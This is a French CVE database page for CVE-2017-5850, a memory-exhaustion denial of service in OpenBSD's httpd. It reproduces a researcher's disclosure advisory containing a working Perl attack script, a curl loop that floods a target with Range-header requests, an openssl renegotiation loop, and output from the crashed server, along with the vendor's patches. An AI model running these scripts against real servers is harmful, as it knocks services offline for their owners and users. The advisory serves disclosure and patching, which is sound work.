CVE-2017-5850 Détail

CVE-2017-5850

Score / Gravité

7.5

Haute

EPSS

6.51%V3

Vecteur

Network

Publié

2017-03-27
13h00 +00:00

Modifié

2017-03-27
12h57 +00:00

Liens officiels

CVE.org

NVD

Notifications pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Gestion des notifications

Liste des Notifications

Notifications pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Critères appliqués l'envoi de l'alerte : par rapport à la dernière alerte envoyée + différences au niveau de CISA, EPSS, CVSS, CWE, Solutions, CPE.

Paramètres

Vous pouvez spécifier un titre qui sera récupéré dans les alertes qui seront envoyées.

Spécifiez ici un CVE ID comme CVE-2025-1234

Planifications

Mois

Prochaine exécution calculée

Jour

Jour de la semaine

Heure

Minute

Date de création

Dernière exécution

Prochaine exécution

Fonctionnalité nécessitant une connexion

Cette fonctionnalité qui vous permet de recevoir des alertes, n'est active que lorsque vous êtes connecté à votre compte.

Descriptions du CVE

httpd in OpenBSD allows remote attackers to cause a denial of service (memory consumption) via a series of requests for a large file using an HTTP Range header.

Informations du CVE

Faiblesses connexes

CWE-ID	Nom de la faiblesse	Source
CWE-770	Allocation of Resources Without Limits or Throttling The product allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on the size or number of resources that can be allocated, in violation of the intended security policy for that actor.

Métriques

Métriques	Score	Gravité	CVSS Vecteur	Source
V3.0	7.5	HIGH	CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H More informations Base: Exploitabilty Metrics The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. Network A vulnerability exploitable with network access means the vulnerable component is bound to the network stack and the attacker's path is through OSI layer 3 (the network layer). Such a vulnerability is often termed 'remotely exploitable' and can be thought of as an attack being exploitable one or more network hops away (e.g. across layer 3 boundaries from routers). Attack Complexity This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability. Low Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. None The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files to carry out an attack. User Interaction This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component. None The vulnerable system can be exploited without interaction from any user. Base: Scope Metrics An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges. Scope Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports. Unchanged An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same. Base: Impact Metrics The Impact metrics refer to the properties of the impacted component. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. None There is no loss of confidentiality within the impacted component. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. None There is no loss of integrity within the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. High There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable). Temporal Metrics The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability. Environmental Metrics	[email protected]
V2	7.8		AV:N/AC:L/Au:N/C:N/I:N/A:C	[email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 41278

Date de publication : 2017-02-06 23h00 +00:00
Auteur : PierreKimSec
EDB Vérifié : No

## Advisory Information Title: Remote DoS against OpenBSD http server (up to 6.0) Advisory URL: https://pierrekim.github.io/advisories/CVE-2017-5850-openbsd.txt Blog URL: https://pierrekim.github.io/blog/2017-02-07-openbsd-httpd-CVE-2017-5850.html Date published: 2017-02-07 Vendors contacted: OpenBSD Release mode: Released CVE: CVE-2017-5850 ## Product Description The OpenBSD project produces a FREE, multi-platform 4.4BSD-based UNIX-like operating system. ## Vulnerabilities Summary The shipped HTTP daemon in OpenBSD (up to the latest version) is prone to 2 remote DoS. The first vulnerability allows an attacker to consume all the CPU power from the remote server (CPU exhaustion). The second vulnerability (Memory exhaustion) allows an attacker to consume all the RAM and the swap space on the remote side. Processes will be killed when running out of swap space. The system will be likely to freeze. ## Details - CPU exhaustion (no CVE entry) OpenBSD's httpd is prone to a SSL DoS with SSL renegotiation: user@kali:~$ (sleep 1; while true;do echo R;done) | openssl s_client -connect 10.0.2.15:443 CONNECTED(00000003) depth=0 C = XX, ST = secure.example.com, CN = secure.example.com verify error:num=18:self signed certificate verify return:1 depth=0 C = XX, ST = secure.example.com, CN = secure.example.com verify return:1 - --- Certificate chain 0 s:/C=XX/ST=secure.example.com/CN=secure.example.com i:/C=XX/ST=secure.example.com/CN=secure.example.com - --- Server certificate - -----BEGIN CERTIFICATE----- MIIDCjCCAfICCQC0tQxJqUqQTzANBgkqhkiG9w0BAQsFADBHMQswCQYDVQQGEwJY WDEbMBkGA1UECAwSc2VjdXJlLmV4YW1wbGUuY29tMRswGQYDVQQDDBJzZWN1cmUu ZXhhbXBsZS5jb20wHhcNMTcwMTI3MTU0MjMzWhcNMTgwMTI3MTU0MjMzWjBHMQsw CQYDVQQGEwJYWDEbMBkGA1UECAwSc2VjdXJlLmV4YW1wbGUuY29tMRswGQYDVQQD DBJzZWN1cmUuZXhhbXBsZS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK AoIBAQCjIY7mMaNVLmPDA4ir59mgdQEM4TFTgz5cv9SqU4hQq0eVmpJkEfJPHErF to5NdF2ZIqhL+F34GqZcCC8qO3xB33dAevENWWbA4KObpIybHr8bFeDYYl5GuaCO hizmcffU3P1ztRNXB4sCTTQwkyry8ZUDaeINLGMb0HhFR9u5TJY6tSB0KMIuiBsH 1hEp8bNxUM046D0wkZkyIgM/or6uj5jRj33aYUn6ZiU8a6UKSAVZJLqziyNcQ0hA 64gS6oapUnMVYJIUDJynOhY5e8xZmD+2pB4NLTIxAEdSyQ4wQ4jBiRFVL+E68fuw kASmrA4gAbSCO+lYBO8wCRiVOwOdAgMBAAEwDQYJKoZIhvcNAQELBQADggEBAC1L 213ziHqFmC8nLWvvjyoHY2PRFS1ofrfciv+fpohn2GN+eVb8DGTo+KLZ910/PUPk dzTa7eOlkvR1OG7BUlnia6pGQqizTodvzx0DGgl76k4VpEvJAOZ4f7Plry4qgr5Y y3Fwym1k3DlNJ5Jqh8Vp2HETbqcovATsUHRS5t/oc6N2egq1DYVC5CdGRgvmmUl+ NBjKOASYoP8S4OQ51wMmXrygFqKcEkq4/GTUFEaamrbM/J+ChD9EqejSKzZ5owRh 74v10s30OylBdmfOLeyrMv5s6DnJRAdtFEH9Wg7sQDt1P3bGOsObVZlmHCtArl4k m1nHRn8scAFP7QbHl34= - -----END CERTIFICATE----- subject=/C=XX/ST=secure.example.com/CN=secure.example.com issuer=/C=XX/ST=secure.example.com/CN=secure.example.com - --- No client certificate CA names sent - --- SSL handshake has read 1548 bytes and written 503 bytes - --- New, TLSv1/SSLv3, Cipher is ECDHE-RSA-AES256-GCM-SHA384 Server public key is 2048 bit Secure Renegotiation IS supported Compression: NONE Expansion: NONE SSL-Session: Protocol : TLSv1.2 Cipher : ECDHE-RSA-AES256-GCM-SHA384 Session-ID: DA628A16EF4F067ED81E7A26EFA18D9A7D53CBC4ED54C8F6DC11E5E60FF76530 Session-ID-ctx: Master-Key: 9235AFEBCF2A517E896A06CAA7A1AF916646DB5BB4C99B53A79627351C0FFB936EB863B0E50A67DF70A354773CF049BE Key-Arg : None PSK identity: None PSK identity hint: None SRP username: None TLS session ticket lifetime hint: 300 (seconds) TLS session ticket: 0000 - 49 f1 29 da 9e 08 f2 74-c6 f3 eb a1 c7 ee 40 bb I.)....t......@. 0010 - 96 75 54 c8 4f 32 53 7e-51 40 4e a8 e9 57 41 a5 [email protected]. 0020 - 73 3d a9 d6 b8 f7 a0 f8-15 cb be fb f1 4d d9 81 s=...........M.. 0030 - a8 79 56 11 5d 05 32 05-49 df 2b f3 71 89 36 a1 .yV.].2.I.+.q.6. 0040 - 93 dc b9 b5 00 48 6f 94-b1 c5 78 f8 38 3c 63 29 .....Ho...x.8<c) 0050 - ed 45 a2 9e ae fc 7e d7-12 76 34 15 93 b1 3d 3d .E....~..v4...== 0060 - d7 0a 14 f1 01 a7 87 6c-50 93 25 24 5e 4f 1b fa .......lP.%$^O.. 0070 - 51 03 4b fa 7e 23 83 99-51 f6 47 10 8c d1 0e 41 Q.K.~#..Q.G....A 0080 - 5a f7 a5 10 33 a7 37 5d-9b 5e b0 b6 19 e7 e2 61 Z...3.7].^.....a 0090 - ec ea 1c 72 3c 4a ec 11-0f 26 35 76 6e d9 cb 4d ...r<J...&5vn..M 00a0 - c7 f8 57 cb 50 f6 47 02-6b ca be cc 29 04 b7 dc ..W.P.G.k...)... 00b0 - e0 d1 cc 8e 5b f9 05 06-10 72 d7 b6 8e cf 42 6a ....[....r....Bj Start Time: 1485536662 Timeout : 300 (sec) Verify return code: 18 (self signed certificate) - --- RENEGOTIATING depth=0 C = XX, ST = secure.example.com, CN = secure.example.com verify error:num=18:self signed certificate verify return:1 depth=0 C = XX, ST = secure.example.com, CN = secure.example.com verify return:1 RENEGOTIATING depth=0 C = XX, ST = secure.example.com, CN = secure.example.com verify error:num=18:self signed certificate verify return:1 depth=0 C = XX, ST = secure.example.com, CN = secure.example.com verify return:1 RENEGOTIATING depth=0 C = XX, ST = secure.example.com, CN = secure.example.com verify error:num=18:self signed certificate verify return:1 depth=0 C = XX, ST = secure.example.com, CN = secure.example.com verify return:1 RENEGOTIATING [...] - From my test, 1 renegociation thread takes =~ 70% of CPU. top on the main server (10.0.2.15): 14711 www 51 0 1104K 3636K run - 1:07 69.55% httpd Multiple threads will eat all the available CPUs and will be likely to DoS the httpd: 14711 www 63 0 1192K 3708K run - 2:48 33.45% httpd 77207 www 63 0 1284K 3788K run - 1:33 33.06% httpd 78835 www 62 0 1232K 3808K run - 0:15 28.08% httpd There is no trace of such attacks in the httpd logs. An attacker can use tools from THC to perform SSL DoS too (openssl was the fastest solution out of the box): https://www.thc.org/thc-ssl-dos/. ## Details - Memory exhaustion (CVE-2017-5850) A vulnerability exists in the openbsd HTTP daemon. It will result in using all the RAM and the swap space on the remote side, processes will be killed when running out of swap space. The system will be likely to freeze. Requesting file using a file-range will result in having a httpd process doing a full malloc() of the requested file. It appears the entry is not correctly free()'d. Hence, it's possible to DoS the remote server by requesting a file over and over by specifying a custom file range, ie: GET /index.html HTTP/1.1 Range: bytes=1- User-Agent: Pierre loves you Host: fill-me-with-joy This attack is successful if an attacker can identify a 'big' file (i.e. > 10MB) served by the remote HTTP server. Here is a provided PoC (loosely based on KingCope's apache_killer.pl): #!/usr/bin/perl -w use warnings; use IO::Socket; use Parallel::ForkManager; $numforks = 50; if ($#ARGV < 1) { &usage; exit; } while (1) { &killhttpd(); } sub usage { print "OpenBSD HTTP Remote Denial of Service (memory exhaustion) - @PierreKimSec\n"; print "usage: perl killobsdhttpd.pl <host> <remotefile>\n"; } sub killhttpd { print "ATTACKING $ARGV[0] [using $numforks forks]\n"; $pm = new Parallel::ForkManager($numforks); for (0 .. $numforks) { my $pid = $pm->start and next; my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "80", Proto => 'tcp'); $p = "GET $ARGV[1] HTTP/1.1\r\nRange: bytes=1-\r\nAccept: */*\r\nHost: $ARGV[0]\r\nConnection: close\r\n\r\n"; print $sock $p; if (<$sock>) {sleep (0.5); $sock->close();} $pm->finish; } $pm->wait_all_children; } An attacker can use curl to replicate the PoC: curl --limit-rate 1 --continue-at 1 --header "Host: www.example.com" http://target/10mb.fs Stopping the curl process and launching it again will produce one of the remote httpd to use more than 10MB of memory for each request (the size of the 10mb.fs is 10MB) and will DoS the http server and the OpenBSD system by exhausting all the RAM. The OpenBSD system will likely freeze within minutes. PoC with curl (more effective than the perl version, it appears): #!/bin/sh # ./$0 www.target.tld /path/to/file unset http_proxy unset https_proxy for i in $(seq 0 300) do echo sending a req curl --limit-rate 1 --continue-at 1 --header "Host: $1" http://$1/$2 2>/dev/null >/dev/null & sleep 0.5 pkill curl done while sleep 1 do echo "sending a req (slow)" curl --limit-rate 1 --continue-at 1 --header "Host: $1" http://$1/$2 2>/dev/null >/dev/null & pkill curl done This attack works using HTTP and using HTTPS. Current situation in the attacked server (SWAP is full and all the RAM is being completely used): load averages: 7.11, 3.30, 1.38 foo.my.domain 10:26:41 39 processes: 6 running, 32 idle, 1 on processor up 0:03 CPU states: 0.0% user, 0.0% nice, 100% system, 0.0% interrupt, 0.0% idle Memory: Real: 569M/961M act/tot Free: 21M Cache: 49M Swap: 2039M/2040M PID USERNAME PRI NICE SIZE RES STATE WAIT TIME CPU COMMAND 48965 www 28 0 1345M 204M run - 0:05 0.00% httpd 43060 www 28 0 1281M 174M run - 0:05 0.00% httpd 91565 www 28 0 1153M 187M run - 0:04 0.00% httpd 63038 www 2 0 948K 4K idle kqread 0:00 0.00% httpd We see the daemons (httpd and sshd) don't answer anymore: user@kali:~$ 10.0.2.15 80 Trying 10.0.2.15... Connected to 10.0.2.15. Escape character is '^]'. ^] telnet> q Connection closed. user@kali:~$ telnet 10.0.2.15 80 Trying 10.0.2.15... Connected to 10.0.2.15. Escape character is '^]'. ^] telnet> q Connection closed. user@kali:~$ telnet 10.0.2.15 22 Trying 10.0.2.15... Connected to 10.0.2.15. Escape character is '^]'. ^] telnet> q Connection closed. Connection closed by foreign host. ## Vendor Response o The issue about memory exhaustion has been solved in two ways: - - OpenBSD 6.0/5.9: Erratas has been issued at: https://ftp.openbsd.org/pub/OpenBSD/patches/6.0/common/017_httpd.patch.sig https://ftp.openbsd.org/pub/OpenBSD/patches/5.9/common/034_httpd.patch.sig - - OpenBSD -current: We reimplemented support for byte ranges in - -current. The previous implementation was flawed indeed, as it tried to load the complete ranges into memory at once. o High CPU usage is a well-known issue of client-initiated renegotiation. While this can cause higher than normal CPU usage, the processes are still able to service requests. As httpd uses LibreSSL's libtls, a sane TLS API on top of libssl, we decided to disable client-initiated renegotiation for libtls servers in -current. This change was already planned and has now been committed to LibreSSL. libssl http://marc.info/?l=openbsd-cvs&m=148587695222112&w=2 libtls http://marc.info/?l=openbsd-cvs&m=148587827322528&w=2 ## Report Timeline * Jan 25, 2017: Vulnerabilities found by Pierre Kim. * Jan 30, 2017: OpenBSD team is notified of the vulnerabilities. * Jan 30, 2017: OpenBSD team replies that they will study the advisory. * Jan 31, 2017: OpenBSD team confirms the vulnerabilities. * Jan 31, 2017: Pierre Kim asks for CVE entries. * Jan 31, 2017: OpenBSD team releases security patches. * Feb 01, 2017: cve-assign () mitre org assigns CVE-2017-5850 and asks for more details. * Feb 07, 2017: A public advisory is sent to security mailing lists. ## Credit These vulnerabilities were found by Pierre Kim (@PierreKimSec). ## References https://pierrekim.github.io/blog/2017-02-07-openbsd-httpd-CVE-2017-5850.html https://pierrekim.github.io/advisories/CVE-2017-5850-openbsd.txt https://ftp.openbsd.org/pub/OpenBSD/patches/6.0/common/017_httpd.patch.sig https://ftp.openbsd.org/pub/OpenBSD/patches/5.9/common/034_httpd.patch.sig ## Disclaimer This advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCgAGBQJYmMPLAAoJEMQ+Dtp9ky28SpUP/AvB7lMxjIlmMQi7XJFMgxTX 0h3WixpI4tunSKyqC9BflMQRyFQgQ5AX8oh0s2OPJbeVc4RsHf2FBMru6NsvIoyR Tn537GqqYZ19FpQZOYxEtGVd4SbK+LagtY9xkn4c/Tzd+moDv56e3QKl7AtdLETq P/GM+n5I/aN0sSYPDBR8XxYS9HrDPFjPADB3qgM4Jef+TBpTnP/yL2SFwPgGosrq 05Exo00tK6YXr3zHFAJb/a4Q2L8/nHgZIpLi2iTkISGcOEzWVT3gFeiCdC0cYLHM iqCet2eDqEG6UhpP0eQQrFqM30WQ+8z1nDBj4wxX07Np0ZTWkYRw+ezXDYFHIMLE uCkVJRRm2zZOTfq8qxTldhE1wyNtd+cEBScT9+7+Xz5NN9Fq3zg47XC8AWQkH7tD IAcIF+4aO7NAWT9Y5Q+UR0r9aTXn8fGorj9/I5d7g5fWTUKujQjnscuZQ/4e0+1B yb2KAO3Al8s4LQnbqXU/qJ5y/tm+Ra7kxRdogRHpkDR8TwCTwHtTMz+mxGtbIL3X C0plD5sde6MlYCnkd8WKEBb0bBYyR3leaew6s0dx7iz+smQWe9wXufvMLjQgkP6/ 6xfRPyQWOxc4KCWiB5kalQ2soOFVeHbHWimG3/+39qNOb8dY7XA1+0wmYKtdDKvR 3x5MojAce/XvKlx7Cy02 =MAFw -----END PGP SIGNATURE-----